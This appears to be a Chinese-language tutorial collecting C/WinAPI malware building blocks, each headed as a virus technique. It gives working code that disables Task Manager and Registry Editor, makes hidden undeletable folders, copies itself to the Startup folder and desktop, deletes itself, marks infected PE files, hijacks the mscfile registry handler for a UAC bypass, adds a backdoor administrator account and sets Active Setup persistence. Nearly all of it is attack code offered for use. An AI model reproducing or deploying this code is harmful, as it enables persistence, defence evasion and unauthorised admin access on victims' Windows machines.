針對注冊表惡意修改:
#include <stdio.h>
#include <Windows.h>
// 禁用系統任務管理器
void RegTaskmanagerForbidden()
{
HKEY hkey;
DWORD value = 1;
RegCreateKey(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", &hkey);
RegSetValueEx(hkey, "DisableTaskMgr", NULL, REG_DWORD, (LPBYTE)&value, sizeof(DWORD));
RegCloseKey(hkey);
}
// 禁用注冊表編輯器
void RegEditForbidden()
{
HKEY hkey;
DWORD value = 1;
RegCreateKey(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", &hkey);
RegSetValueEx(hkey, "DisableRegistryTools", NULL, REG_DWORD, (LPBYTE)&value, sizeof(DWORD));
RegCloseKey(hkey);
}
// 干掉桌面壁紙
void RegModifyBackroud()
{
DWORD value = 1;
HKEY hkey;
RegCreateKey(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", &hkey);
RegSetValueEx(hkey, "Wallpaper", NULL, REG_SZ, (unsigned char *)"c://", 3);
RegSetValueEx(hkey, "WallpaperStyle", NULL, REG_DWORD, (LPBYTE)&value, sizeof(DWORD));
}
創建不可刪除文件: 創建不可刪除文件關鍵在於在子目錄中創建一個\\anti...\\文件,該文件在系統中有特殊用途.
#include <stdio.h>
#include <shlobj.h>
#include <windows.h>
// 添加不可刪除文件
BOOL SetImmunity(char *FilePath,char *FileName)
{
char file[2048] = { 0 };
strncpy(file, FilePath, strlen(FilePath));
strcat(file, FileName);
BOOL bRet = CreateDirectory(file, NULL);
if (bRet)
{
// 創建無法刪除的文件夾
strcat(file, "\\anti...\\");
bRet = CreateDirectory(file, NULL);
if (bRet)
{
// 設置文件為隱藏屬性
SetFileAttributes(file, FILE_ATTRIBUTE_HIDDEN);
return TRUE;
}
}
return FALSE;
}
// 刪除無法刪除文件
void ClearImmunity(char *FilePath, char *FileName)
{
char file[2048] = { 0 };
strncpy(file, FilePath, strlen(FilePath));
strcat(file, FileName);
strcat(file, "\\anti...\\");
RemoveDirectory(file);
ZeroMemory(file, MAX_PATH);
strncpy(file, FilePath, strlen(FilePath));
strcat(file, FileName);
RemoveDirectory(file);
}
int main(int argc, char * argv[])
{
// 創建 autorun.inf 可免疫自動播放
char *Fuck[4] = { "你", "好", "世", "界" };
int FuckLen = sizeof(Fuck) / sizeof(int);
TCHAR Destop[MAX_PATH];
SHGetSpecialFolderPath(NULL, Destop, CSIDL_DESKTOP, FALSE); // 獲取桌面絕對路徑
for (int x = 0; x < FuckLen; x++)
{
SetImmunity("c://", Fuck[x]);
//ClearImmunity("c://", Fuck[x]);
}
system("pause");
return 0;
}
通過快速啟動項自啟動:
#include <stdio.h>
#include <windows.h>
#include <Shlobj.h>
#pragma comment(lib, "shell32.lib")
BOOL AutoRun_Startup(char *lpszSrcFilePath, char *lpszDestFileName)
{
char szStartupPath[MAX_PATH] = { 0 };
char szDestFilePath[MAX_PATH] = { 0 };
// 獲取快速啟動目錄路徑
SHGetSpecialFolderPath(NULL, szStartupPath, CSIDL_STARTUP, TRUE);
printf("快速啟動路徑: %s\n", szStartupPath);
// 構造拷貝的目的文件路徑
wsprintf(szDestFilePath, "%s\\%s", szStartupPath, lpszDestFileName);
// 拷貝文件到快速啟動目錄下
CopyFile(lpszSrcFilePath, szDestFilePath, FALSE);
return TRUE;
}
int main(int argc, char * argv[])
{
AutoRun_Startup("c://main.exe", "main.exe");
system("pause");
return 0;
}
設置重啟自刪除:
#include <Windows.h>
BOOL RebootDelete(char *pszFileName)
{
// 重啟刪除文件
char szTemp[MAX_PATH] = "\\\\?\\";
::lstrcat(szTemp, pszFileName);
BOOL bRet = ::MoveFileEx(szTemp, NULL, MOVEFILE_DELAY_UNTIL_REBOOT);
return bRet;
}
int main(int argc, char * argv[])
{
RebootDelete("C:\\shell.exe")
system("pause");
return 0;
}
實現病毒自我繁殖:
#include <stdio.h>
#include <Windows.h>
#include <shlobj.h>
#include <time.h>
void Reproduce()
{
char name_str[100] = {};
int name;
srand((unsigned)time(NULL)); // 隨機數種子
name = rand() % 102408;
_itoa(name, name_str, 22); // 將隨機數轉化成字符串
TCHAR szpath[MAX_PATH];
char target[100] = {};
TCHAR Destop[MAX_PATH];
GetModuleFileName(NULL, szpath, MAX_PATH); // 獲取當前執行程序的路徑
SHGetSpecialFolderPath(NULL, Destop, CSIDL_DESKTOP, FALSE); // 獲取桌面絕對路徑
strcat(target, Destop);
strcat(target, "\\");
strcat(target, name_str);
strcat(target, ".exe");
CopyFile(szpath, target, FALSE);
}
int main(int argc, char* argv[])
{
Reproduce();
system("pause");
return 0;
}
病毒的自刪除手段:
#include <stdio.h>
#include <shlobj.h>
#include <windows.h>
BOOL SelfDel()
{
SHELLEXECUTEINFO sei;
TCHAR szModule[MAX_PATH], szComspec[MAX_PATH], szParams[MAX_PATH];
if ((GetModuleFileName(0, szModule, MAX_PATH) != 0) &&
(GetShortPathName(szModule, szModule, MAX_PATH) != 0) &&
(GetEnvironmentVariable("COMSPEC", szComspec, MAX_PATH) != 0))
{
lstrcpy(szParams, "/c del ");
lstrcat(szParams, szModule);
lstrcat(szParams, " > nul");
// 設置結構成員.
sei.cbSize = sizeof(sei);
sei.hwnd = 0;
sei.lpVerb = "Open";
sei.lpFile = szComspec;
sei.lpParameters = szParams;
sei.lpDirectory = 0; sei.nShow = SW_HIDE;
sei.fMask = SEE_MASK_NOCLOSEPROCESS;
// 創建cmd進程.
if (ShellExecuteEx(&sei))
{
// 設置cmd進程的執行級別為空閑執行,使本程序有足夠的時間從內存中退出.
SetPriorityClass(sei.hProcess, IDLE_PRIORITY_CLASS);
// 將自身進程的優先級置高
SetPriorityClass(GetCurrentProcess(), REALTIME_PRIORITY_CLASS);
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);
// 通知Windows資源瀏覽器,本程序文件已經被刪除.
SHChangeNotify(SHCNE_DELETE, SHCNF_PATH, szModule, 0);
return TRUE;
}
}
return FALSE;
}
int main(int argc, char* argv[])
{
SelfDel();
return 0;
}
設置文件感染標志: PE文件中有很多字段並沒有使用到,我們可以在內部寫入參數,實現檢查是否被感染.
#include <stdio.h>
#include <stddef.h>
#include <windows.h>
#define VIRUSFLAGS 0xCCCC
// 向指定文件寫入感染標志
BOOL WriteSig(DWORD dwAddr, DWORD dwSig, HANDLE hFile)
{
DWORD dwNum = 0;
SetFilePointer(hFile, dwAddr, 0, FILE_BEGIN);
WriteFile(hFile, &dwSig, sizeof(DWORD), &dwNum, NULL);
return TRUE;
}
// 檢查文件是否被感染
BOOL CheckSig(DWORD dwAddr, DWORD dwSig, HANDLE hFile)
{
DWORD dwSigNum = 0;
DWORD dwNum = 0;
SetFilePointer(hFile, dwAddr, 0, FILE_BEGIN);
ReadFile(hFile, &dwSigNum, sizeof(DWORD), &dwNum, NULL);
if (dwSigNum == dwSig)
return TRUE;
return FALSE;
}
int main(int argc, char* argv[])
{
HANDLE hFile,hMap = NULL;
LPVOID lpBase = NULL;
hFile = CreateFile("c://1.exe",GENERIC_READ | GENERIC_WRITE,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
hMap = CreateFileMapping(hFile,NULL,PAGE_READWRITE,0,0,0);
lpBase = MapViewOfFile(hMap,FILE_MAP_READ | FILE_MAP_WRITE,0,0,0);
PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)lpBase;
PIMAGE_NT_HEADERS pNtHeader = NULL;
PIMAGE_SECTION_HEADER pSec = NULL;
IMAGE_SECTION_HEADER imgSec = { 0 };
if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
{
printf("文件非可執行文件 \n");
return -1;
}
pNtHeader = (PIMAGE_NT_HEADERS)((BYTE*)lpBase + pDosHeader->e_lfanew);
// 寫入感染標志
WriteSig(offsetof(IMAGE_DOS_HEADER, e_cblp), VIRUSFLAGS, hFile);
// 返回真說明感染過
if (CheckSig(offsetof(IMAGE_DOS_HEADER, e_cblp), VIRUSFLAGS, hFile))
{
printf("文件已被感染,無法重復感染. \n");
}
system("pause");
return 0;
}
關閉UAC權限控制:
#include <Windows.h>
BOOL SetReg(char *lpszExePath)
{
HKEY hKey = NULL;
// 創建項
::RegCreateKeyEx(HKEY_CURRENT_USER, "Software\\Classes\\mscfile\\Shell\\Open\\Command",
0, NULL, 0, KEY_WOW64_64KEY | KEY_ALL_ACCESS, NULL, &hKey, NULL);
if (NULL == hKey)
{
return FALSE;
}
::RegSetValueEx(hKey, NULL, 0, REG_SZ, (BYTE *)lpszExePath, (1 + ::lstrlen(lpszExePath)));
::RegCloseKey(hKey);
return TRUE;
}
int main(int argc,char *argv[])
{
BOOL bRet = FALSE;
PVOID OldValue = NULL;
// 關閉文件重定位
::Wow64DisableWow64FsRedirection(&OldValue);
// 修改注冊表
bRet = SetReg("C:\\Windows\\System32\\cmd.exe");
printf("已關閉 \n");
// 恢復文件重定位
::Wow64RevertWow64FsRedirection(OldValue);
system("pause");
return 0;
}
添加惡意后門賬號:
#include <stdio.h>
#include <assert.h>
#include <windows.h>
#include <lm.h>
#pragma comment(lib,"netapi32")
// 添加系統用戶
void AddUser(LPWSTR UserName, LPWSTR Password)
{
USER_INFO_1 user;
user.usri1_name = UserName;
user.usri1_password = Password;
user.usri1_priv = USER_PRIV_USER;
user.usri1_home_dir = NULL;
user.usri1_comment = NULL;
user.usri1_flags = UF_SCRIPT;
user.usri1_script_path = NULL;
//添加名為lysharks的用戶,密碼為sswordQq123
if (NetUserAdd(NULL, 1, (LPBYTE)&user, 0) == NERR_Success)
printf("創建用戶完成 \n");
// 添加用戶到administrators組
LOCALGROUP_MEMBERS_INFO_3 account;
account.lgrmi3_domainandname = user.usri1_name;
if (NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&account, 1) == NERR_Success)
printf("添加到組完成 \n");
}
// 枚舉系統用戶
void EnumUser()
{
LPUSER_INFO_0 pBuf = NULL;
LPUSER_INFO_0 pTmpBuf;
DWORD dwLevel = 0;
DWORD dwPrefMaxLen = MAX_PREFERRED_LENGTH;
DWORD dwEntriesRead = 0, dwTotalEntries = 0, dwResumeHandle = 0;
DWORD i;
NET_API_STATUS nStatus;
LPTSTR pszServerName = NULL;
do
{
nStatus = NetUserEnum((LPCWSTR)pszServerName, dwLevel, FILTER_NORMAL_ACCOUNT,
(LPBYTE*)&pBuf, dwPrefMaxLen, &dwEntriesRead, &dwTotalEntries, &dwResumeHandle);
if ((nStatus == NERR_Success) || (nStatus == ERROR_MORE_DATA))
{
if ((pTmpBuf = pBuf) != NULL)
{
for (i = 0; (i < dwEntriesRead); i++)
{
assert(pTmpBuf != NULL);
if (pTmpBuf == NULL)
{
break;
}
wprintf(L"%s\n", pTmpBuf->usri0_name, pTmpBuf);
pTmpBuf++;
}
}
}
if (pBuf != NULL)
{
NetApiBufferFree(pBuf);
pBuf = NULL;
}
} while (nStatus == ERROR_MORE_DATA);
NetApiBufferFree(pBuf);
}
int main(int argc, char *argv[])
{
AddUser(L"lyshark", L"123123");
EnumUser();
system("pause");
return 0;
}
ActiveX 實現自啟動:
#include <stdio.h>
#include <windows.h>
//修改或創建字符串類型的鍵值
void CreateStringReg(HKEY hRoot, LPCWSTR szSubkey, LPCWSTR ValueName, LPCWSTR Data)
{
// 創建新的注冊表鍵
HKEY hKey;
long lRet = RegCreateKeyEx(hRoot, szSubkey, 0, NULL,
REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
if (ERROR_SUCCESS != lRet)
return;
//修改或創建注冊表鍵值
lRet = RegSetValueEx(hKey, ValueName, 0, REG_SZ, (BYTE*)Data, wcslen(Data) * 2);
if (ERROR_SUCCESS != lRet)
return;
// 釋放注冊表鍵句柄
RegCloseKey(hKey);
}
// 創建開機自啟動進程
// 計算機\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components
// 注冊一條類似{84B421CD-B018-2513-B0B1-5C76DEF70F20}的子建,然后子鍵中新建StubPath的值項
void CreateAutoRun()
{
HKEY hKey;
DWORD dwDpt = REG_OPENED_EXISTING_KEY;
// 清理一下
RegDeleteKey(HKEY_CURRENT_USER,
L"Software\\Microsoft\\Active Setup\\Installed Components\\{84B421CD-B018-2513-B0B1-5C76DEF70F20}");
// 打開注冊表鍵值
long lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE,
L"SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{84B421CD-B018-2513-B0B1-5C76DEF70F20}",
REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, &hKey);
if (lRet != ERROR_SUCCESS)
{
WCHAR SelfFile[MAX_PATH];
WCHAR SystemPath[MAX_PATH + 20];
//獲取系統目錄
GetSystemDirectory(SystemPath, sizeof(SystemPath));
//在系統目錄與\\activexrun.exe連接
wcscat_s(SystemPath, L"\\main.exe");
//獲取當前進程路徑
GetModuleFileName(NULL, SelfFile, MAX_PATH);
// main.exe復制到C:\windows\system32目錄下
CopyFile(SelfFile, SystemPath, FALSE);
//寫注冊表
CreateStringReg(HKEY_LOCAL_MACHINE,
L"SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{84B421CD-B018-2513-B0B1-5C76DEF70F20}",
L"StubPath", SystemPath);
}
}
int main(int argc, char *argv[])
{
CreateAutoRun();
system("pause");
return 0;
}